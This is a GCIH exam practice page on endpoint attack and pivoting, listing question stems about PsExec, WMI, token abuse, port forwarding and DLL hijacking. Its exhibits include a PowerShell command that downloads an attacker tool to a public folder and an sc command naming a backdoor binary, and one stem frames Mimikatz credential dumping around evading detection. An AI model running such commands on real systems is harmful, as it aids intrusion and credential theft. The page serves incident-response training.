Courseiva

GCIH · topic practice

Endpoint Attack and Pivoting practice questions

This domain covers how attackers move from a compromised endpoint to other systems, and the artifacts they leave behind. You must recognize malicious DLL persistence, token manipulation, WMI remote execution, and PsExec lateral movement. Questions present investigation scenarios and ask you to identify the technique, its purpose, or the evidence it creates on Windows systems.

Courseiva uses original exam-style practice questions designed for learning and revision. The goal is to understand the concepts, recognise exam patterns, and improve through explanations — not memorise copied exam dumps.

Editorial oversight:Johnson Ajibi· MSc IT Security, IEEE Senior Member
20 questionsDomain: Endpoint Attack and Pivoting

What the exam tests

What to know about Endpoint Attack and Pivoting

You must be able to identify common endpoint pivoting techniques and their forensic evidence. The most important thing is knowing the primary artifact left by PsExec, because it is the key to tracking lateral movement across a network.

Identifying malicious DLL persistence in system directories loaded by a Windows service or process.

Explaining how token manipulation enables privilege escalation and lateral movement in Windows pivoting.

Recognizing WMI class and method combinations abused for remote process execution.

Tracking PsExec execution across a network via its primary forensic artifact.

Watch out for

Common Endpoint Attack and Pivoting exam traps

  • ▸Assuming PsExec leaves no remote artifacts; confusing service creation or event logs with the primary artifact.
  • ▸Mixing up WMI classes and methods used for remote execution, such as Win32_Process and Create.
  • ▸Believing token manipulation only escalates privileges locally, missing its role in pivoting to other systems.

Practice set

Endpoint Attack and Pivoting questions

20 questions · select your answer, then reveal the explanation

An attacker has compromised a Windows workstation and successfully injected a beacon into a legitimate process. They wish to perform lateral movement using Mimikatz to extract credentials from LSASS. Which technique minimizes the likelihood of triggering endpoint detection for credential dumping?

An attacker is pivoting through a network using SSH dynamic port forwarding. Which TWO actions should an incident responder perform to identify and disrupt this tunnel?

Which THREE of the following are common indicators of 'living off the land' (LotL) techniques used during pivoting?

Refer to the exhibit. Which security control is most effective at preventing this specific pivot-related activity?

Exhibit

C:\> powershell -Command "Invoke-WebRequest -Uri http://10.0.0.5/tool.exe -OutFile C:\Users\Public\tool.exe"

During lateral movement, an attacker attempts to clear their tracks. Which TWO actions would effectively prevent the incident responder from identifying the source of the compromise?

Which of the following is a 'lateral movement' technique that leverages legitimate cloud service APIs?

An incident responder identifies an active SSH port forwarding tunnel originating from a compromised Linux server to an internal database host. The attacker is using this tunnel to query the database. Which command executed on the compromised endpoint would confirm the active listening socket binding details and associated process PID for this tunnel?

An analyst discovers that an attacker has established persistence and a pivoting channel on a domain-joined Windows server using PsExec. Which TWO forensic artifacts or log sources should the analyst examine to identify evidence of this activity? (Choose TWO)

An attacker has gained access to a Windows workstation and is attempting to pivot to a database server on the same subnet. The database server only allows connections from the compromised workstation's IP address. The attacker wants to use the compromised workstation as a proxy to interact with the database server. Which two techniques would allow the attacker to achieve this pivot? (Choose two.)

Question 10hardmultiple choice
Review the full subnetting walkthrough →

An attacker has compromised a Windows workstation and wants to pivot to a server on a different subnet that is not directly reachable. The attacker sets up a port forwarding rule using Netsh. Which of the following commands would correctly configure the compromised host to listen on port 8080 and forward all traffic to the internal server at 10.10.10.5 on port 3389?

During an investigation, you discover that an attacker used the Windows `runas` command with the `/savecred` option on a compromised workstation to execute a malicious binary under a cached domain administrator account. The attacker then deleted the binary and cleared the Security event log. Which of the following forensic artifacts would MOST likely still contain evidence of the account used and the execution of the binary?

An incident responder is investigating a suspected pivot on a Windows server. The attacker may have used the Windows Remote Management (WinRM) service to execute commands on the server from a compromised workstation. Which TWO artifacts or indicators should the responder examine to confirm and analyze this lateral movement? (Choose two.)

Refer to the exhibit. An attacker attempts to establish persistence by creating a new service. Why did the command fail?

Exhibit

C:\> sc query binPath="C:\Windows\Temp\backdoor.exe"
[SC] OpenService FAILED 1060:

The specified service does not exist.

An attacker is using WMI (Windows Management Instrumentation) to move laterally. Which WMI class and method combination is frequently abused for remote process execution?

During an investigation, you observe an attacker using 'PsExec' to move laterally. What is the primary artifact created by PsExec that can be used to track its execution across the network?

An attacker has compromised a Linux host and is pivoting using a SOCKS proxy. Which tool is most commonly utilized for this purpose in a cross-platform environment?

Why are 'Pass-the-Hash' (PtH) attacks effective for pivoting in a Windows environment?

Which of the following describes the 'SMB Relay' attack during lateral movement?

What is the primary function of the 'Token Manipulation' technique in Windows pivoting?

An incident responder investigating a compromised Windows workstation discovers that an attacker established persistent command and control using a malicious DLL. The DLL was placed in a system directory and loaded by a legitimate, signed Microsoft binary through DLL search order hijacking. Which response action effectively remediates the persistence while preserving the legitimate binary and minimizing host downtime?

Free account

Track your progress over time

Create a free account to save your results and see which topics improve across sessions.

Focused Endpoint Attack and Pivoting sessions

Start a Endpoint Attack and Pivoting only practice session

Every question in these sessions is drawn from the Endpoint Attack and Pivoting domain — nothing else.

Related practice questions

Related GCIH topic practice pages

Move into related areas when this topic feels solid.

Frequently asked questions

What does the GCIH exam test about Endpoint Attack and Pivoting?
You must be able to identify common endpoint pivoting techniques and their forensic evidence. The most important thing is knowing the primary artifact left by PsExec, because it is the key to tracking lateral movement across a network.
How should I use these practice questions?
Select your answer before revealing the explanation. Then read why each option is right or wrong — this active recall approach builds retention far faster than re-reading notes.
Can I practise just Endpoint Attack and Pivoting questions in a focused session?
Yes — the session launcher on this page draws every question from the Endpoint Attack and Pivoting domain. Use a 10-question session first to gauge your baseline, then move to 20 or 30 once the weak spots are clear.
Where can I practise other GCIH topics?
Use the topic links above to move to related areas, or go back to the GCIH question bank to see all topics.
Are these real exam questions or dumps?
These are original practice questions written to test the same concepts the GCIH exam covers. They are not copied from any real exam or dump site.